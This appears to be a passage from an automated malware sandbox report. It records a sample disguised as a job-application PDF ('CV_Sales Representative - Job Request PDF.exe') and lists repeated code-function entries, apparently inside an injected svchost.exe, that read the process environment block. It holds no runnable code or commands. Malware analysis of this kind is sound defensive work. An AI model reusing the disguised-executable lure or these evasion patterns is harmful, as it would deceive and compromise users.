            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe | Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB2349 mov eax, dword ptr fs:[00000030h]3_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov ecx, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB035C mov eax, dword ptr fs:[00000030h]3_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFA352 mov eax, dword ptr fs:[00000030h]3_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD8350 mov ecx, dword ptr fs:[00000030h]3_2_03AD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0634F mov eax, dword ptr fs:[00000030h]3_2_03B0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402A0 mov eax, dword ptr fs:[00000030h]3_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402A0 mov eax, dword ptr fs:[00000030h]3_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC62A0 mov eax, dword ptr fs:[00000030h]3_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E284 mov eax, dword ptr fs:[00000030h]3_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E284 mov eax, dword ptr fs:[00000030h]3_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB0283 mov eax, dword ptr fs:[00000030h]3_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB0283 mov eax, dword ptr fs:[00000030h]3_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB0283 mov eax, dword ptr fs:[00000030h]3_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402E1 mov eax, dword ptr fs:[00000030h]3_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402E1 mov eax, dword ptr fs:[00000030h]3_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A402E1 mov eax, dword ptr fs:[00000030h]3_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B062D6 mov eax, dword ptr fs:[00000030h]3_2_03B062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2823B mov eax, dword ptr fs:[00000030h]3_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34260 mov eax, dword ptr fs:[00000030h]3_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34260 mov eax, dword ptr fs:[00000030h]3_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34260 mov eax, dword ptr fs:[00000030h]3_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2826B mov eax, dword ptr fs:[00000030h]3_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0274 mov eax, dword ptr fs:[00000030h]3_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB8243 mov eax, dword ptr fs:[00000030h]3_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB8243 mov ecx, dword ptr fs:[00000030h]3_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0625D mov eax, dword ptr fs:[00000030h]3_2_03B0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A250 mov eax, dword ptr fs:[00000030h]3_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36259 mov eax, dword ptr fs:[00000030h]3_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEA250 mov eax, dword ptr fs:[00000030h]3_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEA250 mov eax, dword ptr fs:[00000030h]3_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A70185 mov eax, dword ptr fs:[00000030h]3_2_03A70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEC188 mov eax, dword ptr fs:[00000030h]3_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEC188 mov eax, dword ptr fs:[00000030h]3_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD4180 mov eax, dword ptr fs:[00000030h]3_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD4180 mov eax, dword ptr fs:[00000030h]3_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A197 mov eax, dword ptr fs:[00000030h]3_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A197 mov eax, dword ptr fs:[00000030h]3_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A197 mov eax, dword ptr fs:[00000030h]3_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B061E5 mov eax, dword ptr fs:[00000030h]3_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A601F8 mov eax, dword ptr fs:[00000030h]3_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF61C3 mov eax, dword ptr fs:[00000030h]3_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF61C3 mov eax, dword ptr fs:[00000030h]3_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A60124 mov eax, dword ptr fs:[00000030h]3_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov ecx, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov eax, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov eax, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov eax, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF0115 mov eax, dword ptr fs:[00000030h]3_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04164 mov eax, dword ptr fs:[00000030h]3_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04164 mov eax, dword ptr fs:[00000030h]3_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov ecx, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C156 mov eax, dword ptr fs:[00000030h]3_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC8158 mov eax, dword ptr fs:[00000030h]3_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36154 mov eax, dword ptr fs:[00000030h]3_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36154 mov eax, dword ptr fs:[00000030h]3_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A280A0 mov eax, dword ptr fs:[00000030h]3_2_03A280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC80A8 mov eax, dword ptr fs:[00000030h]3_2_03AC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF60B8 mov eax, dword ptr fs:[00000030h]3_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]3_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3208A mov eax, dword ptr fs:[00000030h]3_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]3_2_03A2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A380E9 mov eax, dword ptr fs:[00000030h]3_2_03A380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB60E0 mov eax, dword ptr fs:[00000030h]3_2_03AB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]3_2_03A2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A720F0 mov ecx, dword ptr fs:[00000030h]3_2_03A720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB20DE mov eax, dword ptr fs:[00000030h]3_2_03AB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A020 mov eax, dword ptr fs:[00000030h]3_2_03A2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C020 mov eax, dword ptr fs:[00000030h]3_2_03A2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC6030 mov eax, dword ptr fs:[00000030h]3_2_03AC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB4000 mov ecx, dword ptr fs:[00000030h]3_2_03AB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5C073 mov eax, dword ptr fs:[00000030h]3_2_03A5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A32050 mov eax, dword ptr fs:[00000030h]3_2_03A32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6050 mov eax, dword ptr fs:[00000030h]3_2_03AB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A307AF mov eax, dword ptr fs:[00000030h]3_2_03A307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE47A0 mov eax, dword ptr fs:[00000030h]3_2_03AE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD678E mov eax, dword ptr fs:[00000030h]3_2_03AD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A527ED mov eax, dword ptr fs:[00000030h]3_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A527ED mov eax, dword ptr fs:[00000030h]3_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A527ED mov eax, dword ptr fs:[00000030h]3_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]3_2_03ABE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A347FB mov eax, dword ptr fs:[00000030h]3_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A347FB mov eax, dword ptr fs:[00000030h]3_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]3_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB07C3 mov eax, dword ptr fs:[00000030h]3_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C720 mov eax, dword ptr fs:[00000030h]3_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C720 mov eax, dword ptr fs:[00000030h]3_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6273C mov eax, dword ptr fs:[00000030h]3_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6273C mov ecx, dword ptr fs:[00000030h]3_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6273C mov eax, dword ptr fs:[00000030h]3_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAC730 mov eax, dword ptr fs:[00000030h]3_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C700 mov eax, dword ptr fs:[00000030h]3_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30710 mov eax, dword ptr fs:[00000030h]3_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A60710 mov eax, dword ptr fs:[00000030h]3_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38770 mov eax, dword ptr fs:[00000030h]3_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6674D mov esi, dword ptr fs:[00000030h]3_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6674D mov eax, dword ptr fs:[00000030h]3_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6674D mov eax, dword ptr fs:[00000030h]3_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30750 mov eax, dword ptr fs:[00000030h]3_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABE75D mov eax, dword ptr fs:[00000030h]3_2_03ABE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72750 mov eax, dword ptr fs:[00000030h]3_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72750 mov eax, dword ptr fs:[00000030h]3_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB4755 mov eax, dword ptr fs:[00000030h]3_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]3_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A666B0 mov eax, dword ptr fs:[00000030h]3_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34690 mov eax, dword ptr fs:[00000030h]3_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34690 mov eax, dword ptr fs:[00000030h]3_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB06F1 mov eax, dword ptr fs:[00000030h]3_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB06F1 mov eax, dword ptr fs:[00000030h]3_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]3_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]3_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E627 mov eax, dword ptr fs:[00000030h]3_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A66620 mov eax, dword ptr fs:[00000030h]3_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A68620 mov eax, dword ptr fs:[00000030h]3_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3262C mov eax, dword ptr fs:[00000030h]3_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE609 mov eax, dword ptr fs:[00000030h]3_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72619 mov eax, dword ptr fs:[00000030h]3_2_03A72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF866E mov eax, dword ptr fs:[00000030h]3_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF866E mov eax, dword ptr fs:[00000030h]3_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A660 mov eax, dword ptr fs:[00000030h]3_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A660 mov eax, dword ptr fs:[00000030h]3_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A62674 mov eax, dword ptr fs:[00000030h]3_2_03A62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4C640 mov eax, dword ptr fs:[00000030h]3_2_03A4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB05A7 mov eax, dword ptr fs:[00000030h]3_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB05A7 mov eax, dword ptr fs:[00000030h]3_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB05A7 mov eax, dword ptr fs:[00000030h]3_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A545B1 mov eax, dword ptr fs:[00000030h]3_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A545B1 mov eax, dword ptr fs:[00000030h]3_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A32582 mov eax, dword ptr fs:[00000030h]3_2_03A32582
